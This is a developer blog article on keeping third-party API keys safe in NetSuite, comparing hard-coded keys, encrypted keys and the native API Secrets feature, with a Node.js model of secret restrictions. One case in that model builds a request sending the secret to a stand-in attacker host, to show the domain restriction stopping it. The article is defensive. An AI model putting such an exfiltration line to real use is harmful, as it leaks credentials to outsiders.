Credential Shield: Securing Third-Party App Access in NetSuite

Jona Obrador • September 20, 2024

When I started out as a NetSuite developer, integrating with third-party applications such as Amazon, Shopify, and warehouse management systems (WMS) was a routine part of my projects. One of my main concerns was protecting the credentials those integrations use, because anyone holding them can read and change data on both sides of the integration.


Today, we’re discussing best practices to keep those credentials out of the wrong hands. An attacker who knows the API and holds the credentials can read, alter or delete business data, so how and where the credentials are stored matters.

Hard-Coding Practice

Risk: Hard-coding API keys directly into source code is a risky practice. The key is readable by anyone who can see the file, whether in the source repository, in the account’s File Cabinet, or in a bundle installed into another account, and it can be copied and misused without anyone noticing.


Mitigation: When deploying as part of a SuiteBundle or SuiteApp, mark the files containing sensitive values as hidden and locked so that users of the target account cannot open or edit them. Treat this as a stop-gap only: the key is still stored in plaintext inside the file, it is unprotected wherever the source lives outside the bundle, and a leaked key cannot be rotated without shipping a new release. The API Secrets feature described below removes the key from the code altogether.



Storing Encrypted API Keys

To enhance security, consider encrypting your API keys before storing them. Here’s a basic example of encrypting an API key from a user event script’s beforeLoad() entry point, in three steps.


1. Encrypt: Encrypt the API key using an encryption key that only your application knows.

2. Store: Save the encrypted API key in a custom record.

Screenshot: the custom record holding the encrypted API key value.

3. Retrieve: When the key is needed, load the encrypted value from the custom record, decrypt it with your encryption key, and use the plaintext only for the request itself.

Demo video here: Get Giphy via Encrypted Key


Risk: The encryption key itself has to live somewhere the script can read it, which in practice means the source code, so anyone who can read the script can decrypt every stored key. The encryption adds a step for the attacker, not a barrier. A second risk is operational: if the decrypted key is written to the execution log, even once while debugging, it sits there in plaintext for anyone with access to the logs.


Mitigation: When deploying a SuiteBundle or SuiteApp, hide and lock the files that contain encryption keys, and never log a decrypted value. The same limits as for hard-coding apply: this protects against users of the target account, not against anyone with access to the source.


NetSuite API Secrets

NetSuite has introduced a native feature for exactly this problem: API Secrets. The secret is entered once in the account and referenced from scripts by its script ID rather than by value, so the plaintext never appears in code.


1. Store API key via API Secret



  • Navigate to Setup > Company > API Secrets > New
  • Give the secret a name and note its script ID (it begins with custsecret_); scripts reference the secret by this ID.
  • Paste your API key into the Password field.
  • Check Allow for All Scripts and Allow for All Domains. This is convenient for a demo; for production use, restrict both (see Limit Access below), since a secret allowed for all domains can be sent by any permitted script to any host.
Screenshot: the API Secret record for the Giphy API key, showing its name and script ID.


2. Retrieve the API Key: In the script, build the request with https.createSecureString(), passing an input string in which the secret appears as its script ID in curly braces (for example {custsecret_giphy_api_key}) where the key value would otherwise go. The platform substitutes the real value when the request is sent; the script itself never receives the plaintext.

Demo video here: Get Giphy via Secret


Limit Access to API Secret (Optional)

To ensure that API Secrets are only accessible to authorized scripts, follow these steps:


1. Navigate to the API Secret: Go to Setup > Company > API Secrets and select the API Secret you have created.


2. Set Restrictions:

  • Click on the Restrictions tab.
  • Enter the Script ID of the specific script that should have access to this API Secret. This ensures that only the designated script can retrieve the API Secret, enhancing security by limiting access. Where the API lives on a fixed host, restrict the domains in the same tab so the secret can only be sent to the service it belongs to.

Demo Video for Unauthorized: Get Giphy via Secret - Unauthorized Script

Risk: Low compared with the two approaches above. The script only ever holds a reference to the secret; the platform substitutes the value when the request is made, and attempts to log the SecureString return an empty object, so neither the code nor the execution log exposes the key. What remains is governance: restrict each secret to the scripts and domains that need it, because a secret allowed for all domains can be sent by a permitted script to any host, and review who in the account can edit API Secrets and script deployments.
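To make the difference from the encryption approach concrete, here is an added example in Node.js that models the behaviour described in this section: the script holds only a placeholder, the value is substituted at send time, logging the object yields an empty object, and the Restrictions (allowed scripts and allowed domains) are enforced at the point of use. This is a model for illustration, not NetSuite’s implementation and not the article’s code; the vault map stands in for Setup > Company > API Secrets, and custsecret_giphy_api_key, customscript_get_giphy and the sample key value are assumed names.

```javascript
// Added example in Node.js (not NetSuite's implementation, not the article's
// code): a model of why a secret referenced by script ID is safer than a
// decrypted value held in script scope. ASSUMPTIONS: secretVault stands in for
// the account's API Secrets store; custsecret_giphy_api_key is the secret's
// script ID; customscript_get_giphy is the authorized script.
const secretVault = new Map([
  ['custsecret_giphy_api_key', {
    value: 'gph_constructed_sample_key',                 // constructed, not a real key
    allowedScripts: new Set(['customscript_get_giphy']), // Restrictions tab: scripts
    allowedDomains: new Set(['api.giphy.com']),          // Restrictions tab: domains
  }],
]);

// Placeholder syntax: the secret's script ID in curly braces.
const PLACEHOLDER = /\{(custsecret_[a-z0-9_]+)\}/g;

// The object a script gets back carries only the template with placeholders.
class SecureString {
  constructor(template) { this.template = template; }
  // Logging the object reveals nothing, matching "returns an empty object" above.
  toJSON() { return {}; }
  toString() { return ''; }
}

function createSecureString(input) { return new SecureString(input); }

// Platform side (a script cannot reach the vault itself): substitute each
// placeholder while enforcing the script restriction, then enforce the domain
// restriction against the host the request would actually go to.
function resolveForRequest(secureString, callingScriptId) {
  const usedSecrets = [];
  const resolved = secureString.template.replace(PLACEHOLDER, (_, id) => {
    const entry = secretVault.get(id);
    if (!entry) throw new Error(`unknown secret ${id}`);
    if (!entry.allowedScripts.has(callingScriptId)) {
      throw new Error(`script ${callingScriptId} is not allowed to use ${id}`);
    }
    usedSecrets.push(id);
    return entry.value;
  });
  const host = new URL(resolved).hostname;
  for (const id of usedSecrets) {
    if (!secretVault.get(id).allowedDomains.has(host)) {
      throw new Error(`${id} may not be sent to ${host}`);
    }
  }
  return { host, resolvedUrl: resolved };
}

// Stand-in for https.get({ url: secureString }): reports what would be sent,
// or why the platform refused. No network request is made.
function secureGet(secureString, callingScriptId) {
  try {
    return { ok: true, ...resolveForRequest(secureString, callingScriptId) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

const GIPHY_URL = createSecureString(
  'https://api.giphy.com/v1/gifs/search?q=cat&api_key={custsecret_giphy_api_key}');

// 1. Authorized script, allowed domain: the key is substituted only at send time.
function authorizedCall() { return secureGet(GIPHY_URL, 'customscript_get_giphy'); }

// 2. The "Unauthorized Script" demo: a script not on the restriction list.
function unauthorizedScriptCall() { return secureGet(GIPHY_URL, 'customscript_other'); }

// 3. An authorized but compromised script trying to ship the key elsewhere:
//    stopped by the domain restriction, not by the script restriction.
function exfiltrationAttempt() {
  return secureGet(
    createSecureString('https://attacker.example/collect?k={custsecret_giphy_api_key}'),
    'customscript_get_giphy');
}

// 4. What log.debug() of the secure string would show.
function whatLoggingShows() { return JSON.stringify(GIPHY_URL); }
```

Case 3 is why “Allow for All Domains” deserves attention in production: the script restriction alone does nothing against an authorized script that has been modified to send the secret to another host. In NetSuite these checks happen server-side and the exact error text differs; the model only shows where each restriction bites.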


Final Thoughts

NetSuite API Secrets give you a native way to keep sensitive values out of code and logs, and they are a genuine addition to the NetSuite security toolkit. I highly recommend using this feature: it is easier to manage than hand-rolled encryption and, unlike it, never hands the plaintext to the script.


To see the complete SuiteScript code and implementation details discussed in this article, visit Jona's GitHub repository.


Jona Obrador, Senior NetSuite Developer

Meet the Author

Jona has over a decade of experience in SuiteCloud Development on the NetSuite platform. She specializes in implementing advanced solutions and has led teams in creating high-quality software. Jona holds multiple certifications and has been recognized with awards like the Summit Award and Quality Champion Award.

